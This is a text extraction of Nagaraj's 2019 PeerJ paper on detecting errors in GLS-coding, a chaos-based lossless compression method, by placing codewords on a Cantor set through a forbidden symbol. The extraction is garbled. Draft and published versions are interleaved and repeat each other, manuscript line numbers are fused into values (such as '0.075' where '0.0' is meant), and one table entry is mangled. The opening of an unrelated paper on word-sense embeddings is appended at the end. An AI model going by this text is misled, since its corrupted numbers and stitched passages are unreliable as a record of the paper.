skewed-binary map instead of the skewed- tent map. Figure 1. GLS-coding: An example. For the message M = 0010110100 (L = 10, p = 0.6), the above figure shows the backward-iteration from 00 to 100 on the GLS T0.6. With [ST ART0,END0) = [0.0,1.0) and iterating backwards, we obtain [ST ART1,END1) = [0.0,0.6), [ST ART2,END2) = [0.0,0.36), [ST ART3,END3) = [0.8560,1.0) and so on. In this figure, when we go from the symbols 00 to 100, we go from [ST ART2,END2) = [0.0,0.36) to [ST ART3,END3) = [0.8560,1.0) since the symbolic sequence at this iteration is 1. This process is repeated until we have a final interval [ST ARTL−1,ENDL−1) for the entire M. Given the symbolic sequence {Si}, the inverse of Tp is given by: T −1p (y j) = { py j, if S j = 0, 1 − y j(1 − p), if S j = 1, For GLS-coding, we begin by treating the given message M as a symbolic sequence {Si}i=L−1i=0 of length73 L on the GLS Tp. The goal is to obtain the initial value x0 ∈ [0,1) which when iterated forwards on Tp74 produces the symbolic sequence {Si} (= message M). To obtain x0, we begin by initializing ST ART0 = 0.075 and END0 = 1.0. We then determine the inverse images of ST ART0 and END0 by iterating backwards on76 Tp, by using T −1p and starting with the last symbol SL−1. At the end of the first back-iteration, we obtain77 ST ART1 and END1. We determine the inverse images of ST ART1 and END1 (given SL−2) to determine the78 new interval [ST ART2,END2). This is repeated L times to yield the final interval [ST ARTL−1,ENDL−1).79 All points within this final interval have the same symbolic sequence (= M = {Si}). We take the mid-point80 x0 = ST ARTL−1+ENDL−1 2 as the compressed file. Since x0 is a real number (between 0 and 1), we write81 its binary representation to the file. The number of bits needed to represent the compressed file x0 is82 ⌈−log2(ENDL−1 − ST ARTL−1)⌉ bits. This is proved to be Shannon optimal3 in (Nagaraj et al., 2009) and83 Arithmetic coding is shown to be a special case of GLS-coding4.84 GLS-decoding is straightforward. At the decoder, given the value of p, we construct the GLS (skew-85 tent map) Tp as described earlier. Given that we know x0 (the compressed file ), all that we need to do is86 iterate forwards on the map Tp for L (= length of message M) iterations and output the symbolic sequence87 {Si}. This is the decoded message and in the absence of any noise, this is exactly the same as M which88 was input to the encoder.89 As an example, consider M = 0010110100 (L = 10). In this case, p = 610 = 0.6 and T0.6 is shown in90 Fig. 1. With ST ART0 = 0.0 and END0 = 1.0, we obtain [ST ART1,END1) = [0.0,0.6), [ST ART2,END2) =91 [0.0,0.36), [ST ART3,END3) = [0.8560,1.0) and so on.92 2.1 Effect of single-bit error on GLS-decoding: Sensitive dependence on initial value of93 the map94 Thus far, we have discussed lossless coding in the absence of any kind of noise. However, in practical95 applications, noise is unavoidable. If the data is in a compressed form, then it is quite likely that the96 3The number of bits needed to store the compressed file x0 approaches the entropy H asymptotically as the length of the message approaches ∞. 4Arithmetic code turns out to be using the skewed-binary map instead of the skewed-tent map. 3/10 PeerJ Comput. Sci. reviewing PDF | (CS-2018:10:31818:1:1:NEW 15 Dec 2018) Manuscript to be reviewedComputer Science Figure 1 GLS-coding: an example. For the message M = 0010110100 (L = 10,p=0 .6), the above figure shows the backward-iteration from 00 to 100 on the GLS T0.6. With [START0,END0) = [0.0,1.0) and iterating backwards, we obtain [START1,END1) = [0.0,0.6), [START2,END2) = [0.0,0.36), [START3,END3)=[0.8560,1.0) and so on. In this figure, when we go from the symbols 00 to 100, we go from [START2,END2)=[0.0,0.36) to [START3,END3)=[0.8560,1.0) since the symbolic sequence at this iteration is 1. This process is repeated until we have a final interval [STARTL−1,ENDL−1) for the entire M. Full-size DOI: 10.7717/peerjcs.171/fig-1 (=M ={Si}). We take the mid-point x0= STARTL−1+ENDL−1 2 as the compressed file. Since x0 is a real number (between 0 and 1), we write its binary representation to the file. The number of bits needed to represent the compressed file x0 is d−log2(ENDL−1−STARTL−1)e bits. This is proved to be Shannon optimal3 in Nagaraj, Vaidya & Bhat (2009) and Arithmetic coding is shown to be a special case of GLS-coding4. GLS-decoding is straightforward. At the decoder, given the value of p, we construct the GLS (skew-tent map) Tp as described earlier. Given that we know x0 (the compressed file), all that we need to do is iterate forwards on the map Tp for L (= length of message M) iterations and output the symbolic sequence {Si}. This is the decoded message and in the absence of any noise, this is exactly the same as M which was input to the encoder. As an example, consider M =0010110100 (L=10). In this case, p= 610 =0.6 and T0.6 is shown in Fig. 1. With START0 =0.0 and END0 =1.0, we obtain [START1,END1)= [0.0,0.6), [START2,END2)=[0.0,0.36), [START3,END3)=[0.8560,1.0) and so on. Effect of single-bit error on GLS-decoding: sensitive dependence on initial value of the map Thus far, we have discussed lossless coding in the absence of any kind of noise. However, in practical applications, noise is unavoidable. If the data is in a compressed form, then it is quite likely that the decoder would be unable to decode or would decode incorrectly. Even detecting whether an error has occurred helps in several communication protocols since a repeat request could be initiated. In GLS-coding, the compressed file is the initial value of the symbolic sequence (the message M) on the appropriate GLS. Since GLS is a chaotic map, it exhibits sensitive dependence on initial values, the hallmark of deterministic chaos (Alligood, Sauer & Yorke, 1996). A small perturbation in the initial value will result in a symbolic sequence which Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 4/13 https://peerj.com https://doi.org/10.7717/peerjcs.171/fig-1 http://dx.doi.org/10.7717/peerj-cs.171 Figure 2. Effect of noise on GLS-coding: (A) The first bit of the compressed file is flipped. The decoded message is very different from the actual intended message. (B) The middle bit (bit no. 3610) of the compressed file is flipped. The first 5000 bits are decoded without error and the remaining 5000 bits show lots of decoding error. ( p = 0.2,N = 10,000, Compressed file size = 7220 bits). In both cases, only part of the difference is shown. decoder would be unable to decode or would decode incorrectly. Even detecting whether an error has97 occurred helps in several communication protocols since a repeat request could be initiated.98 In GLS-coding, the compressed file is the initial value of the symbolic sequence (the message M) on99 the appropriate GLS. Since GLS is a chaotic map, it exhibits sensitive dependence on initial values, the100 hallmark of deterministic chaos (Alligood et al., 1996). A small perturbation in the initial value will result101 in a symbolic sequence which is uncorrelated to the original symbolic sequence after a few iterations.102 This means that with a very high probability, even a slight amount of noise that is added to the initial103 value (compressed file) will result in a wrongly decoded message (symbolic sequence), which will be very104 different from the actual intended message. This is demonstrated in Fig. 2. The first bit of the compressed105 file is flipped and GLS-decoding is performed. The difference in the decoded message from the original106 message is shown in Fig. 2(A). As it can be seen, the decoded message is very different from the original107 message. On the other hand, if the middle bit of the compressed file is flipped then the decoded image is108 accurate up to 5000 bits and the remaining 5000 bits are wrongly decoded (Fig. 2(B)). The error affects109 only those bits which are subsequently decoded.110 3 ERROR DETECTION USING CANTOR SET111 In GLS-coding, every real number on the interval [0,1) represents an initial value (compressed file). Thus,112 any error in the initial value will result in another real number which is also an initial value, but for an113 entirely different symbolic sequence (message). It represents a valid compressed file which decodes to a114 different message. Therefore in order to detect errors, we necessarily require that when noise gets added115 to the initial value while transmission on the communication channel, it should result in a value that is not116 a valid compressed file, so that at the decoder it can be flagged for error. This necessarily implies that not117 all real numbers in the interval [0,1) can be valid compressed files. We need to restrict the set of valid118 compressed files to a smaller subset of [0,1). This subset should be uncountable and dense since it should119 be able to decode all possible (infinite length) messages. At the same time, it should have negligible120 measure (zero measure) so that when noise is added, the probability that it falls outside the set is 1. Cantor121 sets provide the perfect solution.122 3.1 The Cantor Set123 The well known middle-third Cantor set (Alligood et al., 1996),(Strogatz, 2018) is a good example to124 illustrate this idea. All real numbers between 0 and 1 which do not have 1 in their ternary expansion125 4/10 PeerJ Comput. Sci. reviewing PDF | (CS-2018:10:31818:1:1:NEW 15 Dec 2018) Manuscript to be reviewedComputer Science Figure 2 Effect of noise on GLS-coding. (A) The first bit of the compressed file is flipped. The decoded message is very different from the actual intended message. (B) The middle bit (bit no. 3610) of the com- pressed file is flipped. The first 5,000 bits are decoded without error and the remaining 5,000 bits show lots of decoding error. (p=0.2, N =10,000, Compressed file size=7,220 bits). In both cases, only part of the difference is shown. Full-size DOI: 10.7717/peerjcs.171/fig-2 is uncorrelated to the original symbolic sequence after a few iterations. This means that with a very high probability, even a slight amount of noise that is added to the initial value (compressed file) will result in a wrongly decoded message (symbolic sequence), which will be very different from the actual intended message. This is demonstrated in Fig. 2. The first bit of the compressed file is flipped and GLS-decoding is performed. The difference in the decoded message from the original message is shown in Fig. 2A. As it can be seen, the decoded message is very different from the original message. On the other hand, if the middle bit of the compressed file is flipped then the decoded image is accurate up to 5,000 bits and the remaining 5,000 bits are wrongly decoded (Fig. 2B). The error affects only those bits which are subsequently decoded. ERROR DETECTION USING CANTOR SET In GLS-coding, every real number on the interval [0,1) represents an initial value (compressed file). Thus, any error in the initial value will result in another real number which is also an initial value, but for an entirely different symbolic sequence (message). It represents a valid compressed file which decodes to a different message. Therefore in order to detect errors, we necessarily require that when noise gets added to the initial value while transmission on the communication channel, it should result in a value that is not a valid compressed file, so that at the decoder it can be flagged for error. This necessarily implies that not all real numbers in the interval [0,1) can be valid compressed files. We need to restrict the set of valid compressed files to a smaller subset of [0,1). This subset should be uncountable and dense since it should be able to decode all possible (infinite length) messages. At the same time, it should have negligible measure (zero measure) so that when noise is added, the probability that it falls outside the set is 1. Cantor sets provide the perfect solution. Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 5/13 https://peerj.com https://doi.org/10.7717/peerjcs.171/fig-2 http://dx.doi.org/10.7717/peerj-cs.171 5The term ‘Cantor Set’ is used here in a more general sense to refer to fractals that are obtained very much like the middle- third Cantor set but with a different proportion (not necessarily 13 rd) removed at every iteration. Please see (Strogatz, 2018). 6Topological Cantor sets are not self- similar. 7For further details, please see the references in Loskot & Beaulieu (2004). The Cantor set The well known middle-third Cantor set (Alligood, Sauer & Yorke, 1996; Strogatz, 2018) is a good example to illustrate this idea. All real numbers between 0 and 1 which do not have 1 in their ternary expansion belong to this Cantor set (call it C). We note down the following ‘‘paradoxical’’ aspects of Cantor sets5 as observed in (Strogatz, 2018): 1. Cantor set C is ‘‘totally disconnected’’. This means that C contains only single points and no intervals. In this sense, all points in C are well separated from each other. 2. On the other hand, C contains no ‘‘isolated points’’. This means that every point in C has a neighbor arbitrarily close by. These two ‘‘paradoxical’’ aspects of Cantor sets (not just for the middle third Cantor set, but even for generalized Cantor sets, as well as, topological Cantor sets6) are actually very beneficial for error detection and correction. Property 1 implies that a small error will ensure that the resulting point is not in C while Property 2 ensures that we can always find the nearest point in C that can be decoded. Self-similar Cantor sets are fractal (their dimension is not an integer). We shall show that repetition codes, one of the oldest error detection/correction codes lie on a Cantor set. Repetition codes Rn lie on a cantor set Repetition codes are the oldest and most basic error detection and correction codes in coding theory. They are frequently used in applications where the cost and complexity of encoding and decoding are a primary concern. Loskot & Beaulieu (2004) provide a long list of practical applications of repetition codes. Repetition codes are robust against impulsive noise and used in retransmission protocols, spread spectrum systems, multicarrier systems, infrared communications, transmit delay diversity, BLAST signaling, rate-matching in cellular systems, and synchronization of ultrawideband systems7. Thus, repetition codes are very useful in communications. They are described as follows. Consider a message from a binary alphabet {0,1}. A repetition code Rn (n>1, odd integer) is a block code which assigns: 0 7→0...0︸︷︷︸ n 1 7→1...1︸︷︷︸ n . Rn can correct up to n−12 bit errors since the minimum hamming distance of Rn is n. Since n is chosen to be an odd positive integer (>1), a majority count in every block of n symbols acts as a very simple but efficient decoding algorithm. The repetition code Rn is a linear block code with a rate = 1n. We shall provide a new interpretation of Rn, inspired by Cantor set. Start with the real line segment (0,1]. Remove the middle (1−2−n+1) fraction of the set (0,1]. In the remaining two intervals, remove the same fraction and repeat this process in a recursive fashion (refer to Fig. 3). When this process is carried over an infinite number of times, the set that remains is a Cantor set. Furthermore, the binary representation of every element of the Cantor set forms the codewords of Rn. Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 6/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.171 000 111 Remove middle 1 – 2 - n+1 0 1 000000 000111 111000 111111 n=3 F F F F Figure 3. Repetition codes Rn lie on a Cantor set: recursively remove the middle (1 − 2−n+1) fraction. As an example, R3 is depicted above. The box-counting dimension of the Cantor set is D = 1 n . This is equal to the rate of the code. establishes a very important connection between the properties of the Cantor set and the property of the168 code.169 4 INCORPORATING ERROR DETECTION INTO GLS-CODING USING A CAN-170 TOR SET171 Having established that one of the oldest error detection/correction methods, namely repetition codes,172 belong to a Cantor set, we shall extend this idea of using Cantor set for error detection to GLS-coding.173 First, we establish a connection between repetition codes and GLS-coding.174 4.1 Repetition Codes Re-visited175 It is a common view to look at Repetition codes as block codes. In this section, we view them as176 GLS-coding with a forbidden symbol.177 We could re-interpret Fig. 3 in a different way. Let the middle 1 − 2−n+1 interval be reserved for178 the forbidden symbol ‘F ’ (this symbol never occurs in the message to be encoded) and the intervals179 [0,2−n) and [1 − 2−n,1) correspond to the symbols ‘0’ and ‘1’ respectively. We treat all binary messages180 as symbolic sequences on this modified map and perform GLS-coding, i.e. find the initial value of a181 given message M. For GLS-coding, we are treating the alphabet {0,F,1} as taking the probabilities182 {2−n,1 − 2−n+1,2−n} respectively. The resulting initial value of GLS-coding is the codeword for the183 message and it turns out that it is the same as Rn(M). Thus we have interpreted Rn(M) as a joint source184 channel code where the source has three alphabets and we are encoding messages that contain only 0 and185 1.186 By reserving a forbidden symbol ‘F ’ which is not used in encoding, all pre-images of the interval187 corresponding to ‘F ’ have to be removed. Thus, we have effectively created the same Cantor set that188 was referred to in the previous section. For error detection, one has to start with the initial value and189 iterate forwards on the modified map and record the symbolic sequence. If the symbolic sequence while190 decoding contains the symbol ‘F ’, then it invariably means that the initial value is not a part of the Cantor191 set and hence not a valid codeword of Rn, thereby detecting that an error has occurred. Thus checking192 whether the initial value received belongs to the Cantor set or not is used for error detection at the decoder.193 4.2 GLS-coding with a Forbidden Symbol194 We have presented two new ways of looking at Repetition codes - 1) the codewords of Rn lie on a Cantor195 set and 2) coding a message is the same as performing GLS-coding with a forbidden symbol reserved196 on the interval [0,1). The two are essentially the same because, by reserving a forbidden symbol F , we197 6/10 PeerJ Comput. Sci. reviewing PDF | (CS-2018:10:31818:1:1:NEW 15 Dec 2018) Manuscript to be reviewedComputer Science Figure 3 Repetition codes Rn lie on a Cantor set: recursively remove the middle (1−2−n+1) fraction. As an example, R3 is depicted above. The box-counting dimension of the Cantor set is D = 1n . This is equal to the rate of the code. Full-size DOI: 10.7717/peerjcs.171/fig-3 In order to see this, consider n=3. Figure 3 shows how R3 is recursively constructed. If the above step is terminated at iteration k, then there remains a set of intervals whose binary expansion (of length nk) contains the codewords for all possible binary messages of length k. For example, at k =2 for R3, we can see that there are four intervals which contains real numbers with binary expansions starting from 000000, 000111, 111000 and 111111. These are the codewords for the messages 00, 01, 10 and 11 respectively. In the limit of this process, the set results in a Cantor set of measure zero which contains codewords for all binary messages which are infinitely long. Box-counting dimension of Rn We noted that repetition codes Rn lie on a Cantor set. It is very easy to compute the box-counting dimension of this Cantor set: D= limδ→0 logB(δ) log(1/δ) where B(δ) is the number of boxes of size δ needed to cover the set. For Rn, the box-counting dimension D= 1n which is equal to the rate of the code. This establishes a very important connection between the properties of the Cantor set and the property of the code. INCORPORATING ERROR DETECTION INTO GLS-CODING USING A CANTOR SET Having established that one of the oldest error detection/correction methods, namely repetition codes, belong to a Cantor set, we shall extend this idea of using a Cantor set for error detection to GLS-coding. First, we establish a connection between repetition codes and GLS-coding. Repetition codes re-visited It is a common view to look at Repetition codes as block codes. In this section, we view them as GLS-coding with a forbidden symbol. Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 7/13 https://peerj.com https://doi.org/10.7717/peerjcs.171/fig-3 http://dx.doi.org/10.7717/peerj-cs.171 We could re-interpret Fig. 3 in a different way. Let the middle 1−2−n+1 interval be reserved for the forbidden symbol ‘ F’ (this symbol never occurs in the message to be encoded) and the intervals [0,2−n) and [1−2−n,1) correspond to the symbols ‘0’ and ‘1’ respectively. We treat all binary messages as symbolic sequences on this modified map and perform GLS-coding, i.e., find the initial value of a given message M. For GLS-coding, we are treating the alphabet {0,F,1} as taking the probabilities {2−n,1−2−n+1,2−n} respectively. The resulting initial value of GLS-coding is the codeword for the message and it turns out that it is the same as Rn(M). Thus, we have interpreted Rn(M) as a joint source channel code where the source has three alphabets and we are encoding messages that contain only 0 and 1. By reserving a forbidden symbol ‘F’ which is not used in encoding, all pre-images of the interval corresponding to ‘F’ have to be removed. Thus, we have effectively created the same Cantor set that was referred to in the previous section. For error detection, one has to start with the initial value and iterate forwards on the modified map and record the symbolic sequence. If the symbolic sequence while decoding contains the symbol ‘F’, then it invariably means that the initial value is not a part of the Cantor set and hence not a valid codeword of Rn, thereby detecting that an error has occurred. Thus checking whether the initial value received belongs to the Cantor set or not is used for error detection at the decoder. GLS-coding with a forbidden symbol We have presented two new ways of looking at Repetition codes—(1) the codewords of Rn lie on a Cantor set and (2) coding a message is the same as performing GLS-coding with a forbidden symbol reserved on the interval [0,1). The two are essentially the same because, by reserving a forbidden symbol F, we have effectively created a Cantor set on which all the codewords lie. But the fact that we can view Rn as GLS-codes enables us to see them as joint source channel codes for the source with alphabets {0,F,1} and with probability distribution {2−n,1−2−n+1,2−n} respectively. The natural question to ask is whether we can use the same method for a different probability distribution of 0 and 1. The answer is positive. Instead of reserving a forbidden symbol F of length 1−2−n+1, we could chose any arbitrary value � > 0 for the forbidden symbol. The value of � determines the amount of redundancy that is going to be available for error detection/correction. It controls the fractal dimension of the Cantor set and hence the rate of the code. As � increases, error detection/correction property improves at the cost of a slight reduction in compression ratio (note that the compression is still lossless, but no longer Shannon optimal). The probability of the symbol ‘0’ is p, but only (1−�)p is allocated on the interval [0,1). Similarly, for the symbol ‘1’: (1−�)(1−p) is allocated. This single parameter � can be tuned for trade-off between error control and lossless compression ratio. We shall show that a very small value of � is sufficient for detecting errors without significantly increasing the compressed file size. For encoding, as before, the binary message is treated as a symbolic sequence on the modified GLS with the forbidden symbol ‘ F’ and the initial value is determined. The Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 8/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.171 initial value which is now on the Cantor set is the compressed file which is stored and/or transmitted to the decoder. Error detection with GLS-decoding The decoder is the same as before except that we now have error detection capability. If the forbidden symbol ‘ F’ is encountered during GLS decoding (this can happen only if noise corrupts the initial value/compressed file and throws it outside the Cantor set), then it is declared that an error has been detected. The decoder can then request the encoder to re-transmit the compressed file as is done in several protocols (Chou & Ramchandran, 2000). However, this scheme does not correct the error. It is quite possible that the noise is such that the initial value gets modified into another value which also happens to fall inside the Cantor set, in which case the decoder will not be able to detect the error (and thus we end up wrongly decoding the message). But, the probability of this occurring is very small (it is zero in the case of messages having infinite length since the measure of the Cantor set is zero). For finite length messages, the probability of such an event is given by the measure of the set of codewords (which is non-zero). In the following section, we perform rigorous experimental tests of the proposed approach. Simulation results Three different values of � (�1 =0.005, �2 =0.03, �3 =0.05) for the length of the interval corresponding to the forbidden symbol ‘ F’ were used. The amount of redundancy that needs to be added is easy to determine. By introducing the forbidden symbol of length �, the valid symbols occupy a sub-interval of length 1−�. Thus, each time a symbol with probability p is encoded, −log2((1−�)p) bits will be spent, whereas only −log2(p) bits would have been spent without the forbidden symbol. Thus, the amount of redundancy is R(�)=−log2((1−�)p)+log2(p)=−log2(1−�) bits/symbol. For N symbols, this would be N ·R(�) bits rounded to the nearest highest integer. Thus the rate of the code will be: Rate = 1 1+R(�) = 1 1−log2(1−�) . (2) As expected, this is equal to the box-counting dimension of the Cantor set. Thus, by plugging in �=1−2−n+1 in Eq. (2), we obtain the rate of the repetition codes as 1n. We introduced a single bit error (one bit is flipped in the entire compressed file) towards the end of the compressed file for binary i.i.d. sources (p=0.1,0.3). Note that, it is much more difficult to detect errors if they happen towards the end of the compressed file than if it occurred in the beginning of the file. This is because, any error can only affect decoding for subsequent bits and if the error was towards the end-of-file (EoF), not many bits are available to catch it. Remember that the Cantor set (having zero measure) is obtained only after an infinite number of iterations. Since we are terminating after a finite number of iterations, we don’t strictly get a Cantor set. In other words, the set that remains when we terminate after a finite number of iterations is an approximation to the Cantor set and it contains points which would have been discarded if we had continued iterating. The single-bit errors closer to the EoF thus decode to points which are not discarded because of this approximation (as we run out of iterations). These errors survive and go undetected. Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 9/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.171 8It should be noted that errors introduced in the beginning of the compressed bitstream were always detected. Table 1 GLS-coding with forbidden symbol: redundancy (N =10,000, CFS, Compressed File Size). CFS �=0 (bits) �1 =0.005 �2 =0.03 �3 =0.05 p N ·R(�1) (bits) CFS (bits) N ·R(�2) (bits) CFS N ·R(�3) (bits) CFS (bits) 0.1 4,690 72 4,762 440 5,130 740 5,430 0.3 8,812 72 8,881 440 9,253 740 95,52 Table 2 GLS-decoding with forbidden symbol: error detection (p=0.1). EoF stands for ‘End-of-File’. Location of single bit-error introduced Number of error events �1 =0.005 �2 =0.03 �3 =0.05 Detected Undetected Detected Undetected Detected Undetected EoF to EoF−49 50 16 34 31 19 41 9 EoF−50 to EoF−99 50 18 32 48 2 49 1 EoF−100 to EoF−149 50 32 18 49 1 50 0 EoF−150 to EoF−249 100 92 8 100 0 100 0 Total 250 158 92 228 22 240 10 Table 3 GLS-decoding with forbidden symbol: error detection (p=0.3). EoF stands for ‘End-of-File’. Location of single bit-error introduced Number of error events �1 =0.005 �2 =0.03 �3 =0.05 Detected Undetected Detected Undetected Detected Undetected EoF to EoF−49 50 9 41 27 23 36 14 EoF−50 to EoF−99 50 15 35 43 7 48 2 EoF−100 to EoF−149 50 29 21 49 1 50 0 EoF−150 to EoF−249 100 69 31 99 1 100 0 Total 250 122 128 218 32 234 16 In our simulations, the location of the single bit error was varied from the last bit to the 250th bit from end-of-file. Thus, the total number of single-bit error events introduced in the compressed bitstream is 250 for each setting of �. This way, we can test the proposed method under the worst scenario8. Table 1 shows the amount of redundancy owing to the allocation of the forbidden symbol. Tables 2 and 3 shows the performance of the method for p=0.1 and p=0.3. As expected, higher values of � are able to detect more errors, but at the cost of increased compressed file size. Table 4 shows the efficiency of the method. Up to 96% of single bit errors introduced at the tail of the compressed file are detected by a modest increase in the redundancy (up to 15.78%). It should be noted that errors introduced in the beginning of the compressed file can be very easily detected by the proposed method. Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 10/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.171 Table 4 GLS-coding with forbidden symbol: efficiency. p % of errors detected �1 =0.005 �2 =0.03 �3 =0.05 0.1 63.2% 91.2% 96.0% 0.3 48.8% 87.2% 93.6% Arithmetic coding with a forbidden symbol: prior work The idea of using a forbidden symbol into arithmetic coding was first introduced by Boyd et al. (1997). It was subsequently studied by Chou & Ramchandran (2000), Grangetto & Cosman (2002), Anand, Ramchandran & Kozintsev (2001), Pettijohn, Hoffman & Sayood (2001) and Bi, Hoffman & Sayood (2006). However, the approach that is taken in this paper is unique and entirely motivated by a non-linear dynamical systems approach, through the wonderful properties of Cantor sets. We are thus able to justify why the method actually works. To the best of our knowledge, none of the earlier researchers have made this close connection between error detection/correction for repetition codes or arithmetic coding and Cantor sets. This work paves the way for future research on error correction using fractals/Cantor sets and potentially a host of new efficient techniques using Cantor sets could be designed. CONCLUSIONS AND FUTURE WORK In this work, we have provided a novel application of Cantor sets for incorporating error detection into a lossless data compression algorithm (GLS-coding). Cantor sets have paradoxical properties that enable error detection and correction. Repetition codes are an example of codewords on a self-similar Cantor set which can detect and correct errors. By reserving a forbidden symbol on the interval [0,1), we can ensure that the codewords for GLS-coding lie on a Cantor set and thereby detect errors while simultaneously GLS- decoding (thus preserving progressive transmission property), and without significantly increasing the compressed file size. This approach can be applied to any mode of GLS and generalizable to larger alphabets. However, we do not know whether other efficient error control codes can be similarly designed using such Cantor sets (or other fractals in higher dimensions) and whether we can exploit the structure of the Cantor set to perform efficient error correction. These are important research directions worth exploring in the future. ACKNOWLEDGEMENTS The author expresses sincere thanks to Prabhakar G. Vaidya for introducing him to the fascinating field of Non-linear dynamics/Chaos, Cantor sets and Fractals, and to William A. Pearlman for introducing him to the equally exciting field of data compression. Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 11/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.171 ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Tata Trusts. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: Tata Trusts. Competing Interests There are no competing interests. Author Contributions • Nithin Nagaraj conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: MATLAB code is available in a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.171#supplemental-information. REFERENCES Alligood KT, Sauer TD, Yorke JA. 1996. Chaos. New York: Springer. Anand R, Ramchandran K, Kozintsev IV. 2001. Continuous error detection (CED) for reliable communication. IEEE Transactions on Communications 49(9):1540–1549 DOI 10.1109/26.950341. Bi D, Hoffman MW, Sayood K. 2006. State machine interpretation of arithmetic codes for joint source and channel coding. In: Data compression conference, 2006. DCC 2006. Proceedings. IEEE, 143–152 DOI 10.1109/DCC.2006.73. Bose R. 2008. Information theory, coding and cryptography. Second Edition. New Delhi: Tata McGraw-Hill Publishing Company Limited. Boyd C, Cleary JG, Irvine SA, Rinsma-Melchert I, Witten IH. 1997. Integrating error detection into arithmetic coding. IEEE Transactions on Communications 45(1):1–3 DOI 10.1109/26.554275. Chou J, Ramchandran K. 2000. Arithmetic coding-based continuous error detection for efficient ARQ-based image transmission. IEEE Journal on Selected Areas in Communications 18(6):861–867 DOI 10.1109/49.848240. Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 12/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.171#supplemental-information http://dx.doi.org/10.7717/peerj-cs.171#supplemental-information http://dx.doi.org/10.7717/peerj-cs.171#supplemental-information http://dx.doi.org/10.1109/26.950341 http://dx.doi.org/10.1109/DCC.2006.73 http://dx.doi.org/10.1109/26.554275 http://dx.doi.org/10.1109/49.848240 http://dx.doi.org/10.7717/peerj-cs.171 Cover TM, Thomas JA. 2006. Elements of information theory. Hoboken: John Wiley & Sons. Grangetto M, Cosman P. 2002. Map decoding of arithmetic codes with a forbidden symbol. In: Proc. of ACIVS 2002, Ghent, Belgium, vol. 58. Hamming RW. 1950. Error detecting and error correcting codes. Bell System Technical Journal 29(2):147–160 DOI 10.1002/j.1538-7305.1950.tb00463.x. Lin S, Costello DJ. 1983. Error control coding: fundamentals and applications. Englewood Cliffs: Prentice-Hall, Inc. Loskot P, Beaulieu NC. 2004. A family of rate 1/2 modified binary block repetition codes. In: Signals, systems and computers, 2004. Conference record of the thirty-eighth Asilomar conference on, vol. 2. Piscataway: IEEE, 1985–1989. Nagaraj N, Vaidya PG, Bhat KG. 2009. Arithmetic coding as a non-linear dynam- ical system. Communications in Nonlinear Science and Numerical Simulation 14(4):1013–1020 DOI 10.1016/j.cnsns.2007.12.001. Pettijohn BD, Hoffman MW, Sayood K. 2001. Joint source/channel coding us- ing arithmetic codes. IEEE Transactions on Communications 49(5):826–836 DOI 10.1109/26.923806. Rissanen J, Langdon GG. 1979. Arithmetic coding. IBM Journal of Research and Develop- ment 23(2):149–162 DOI 10.1147/rd.232.0149. Said A, Pearlman WA. 1996. A new, fast, and efficient image codec based on set par- titioning in hierarchical trees. IEEE Transactions on Circuits and Systems for Video Technology 6(3):243–250 DOI 10.1109/76.499834. Sayood K. 2000. Introduction to data compression. Burlington: Morgan Kaufmann. Shannon C. 1948. A mathematical theory of communication. Bell System Technical Jour- nal 27:379–423 & 623-656, July & October DOI 10.1002/j.1538-7305.1948.tb01338.x. Shannon CE. 1959. Coding theorems for a discrete source with a fidelity criterion. IRE National Convention Record 4:142–163. Strogatz SH. 2018. Nonlinear dynamics and chaos: with applications to physics, biology, chemistry, and engineering. Boca Raton: CRC Press. Taubman D, Marcellin M. 2002. JPEG2000 image compression fundamentals, standards and practice: image compression fundamentals, standards and practice. Boston: Kluwer Academic Publishers. Wallace GK. 1992. The JPEG still picture compression standard. IEEE Transactions on Consumer Electronics 38(1):xviii–xxxiv. Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 13/13 https://peerj.com http://dx.doi.org/10.1002/j.1538-7305.1950.tb00463.x http://dx.doi.org/10.1016/j.cnsns.2007.12.001 http://dx.doi.org/10.1109/26.923806 http://dx.doi.org/10.1147/rd.232.0149 http://dx.doi.org/10.1109/76.499834 http://dx.doi.org/10.1002/j.1538-7305.1948.tb01338.x http://dx.doi.org/10.7717/peerj-cs.171 work_xwij57ezufevpgkcs2vwd6r76u ---- Linear Algebraic Structure of Word Senses, with Applications to Polysemy Sanjeev Arora, Yuanzhi Li, Yingyu Liang, Tengyu Ma, Andrej Risteski Computer Science Department, Princeton University 35 Olden St, Princeton, NJ 08540 {arora,yuanzhil,yingyul,tengyu,risteski}@cs.princeton.edu Abstract Word embeddings are ubiquitous in NLP and information retrieval, but it is unclear what they represent when the word is polysemous. Here it is shown that multiple word senses re- side in linear superposition within the word embedding and simple sparse coding can re- cover vectors that approximately capture the senses. The success of our approach, which applies to several embedding methods, is mathematically explained using a variant of the random walk on discourses model (Arora et al., 2016). A novel aspect of our tech- nique is that each extracted word sense is ac- companied by one of about 2000 “discourse atoms” that gives a succinct description of which other words co-occur with that word sense. Discourse atoms can be of indepen- dent interest, and make the method potentially more useful. Empirical tests are used to verify and support the theory. 1 Introduction Word embeddings are constructed using Firth’s hy- pothesis that a word’s sense is captured by the distri- bution of other words around it (Firth, 1957). Clas- sical vector space models (see the survey by Tur- ney and Pantel (2010)) use simple linear algebra on the matrix of word-word co-occurrence counts, 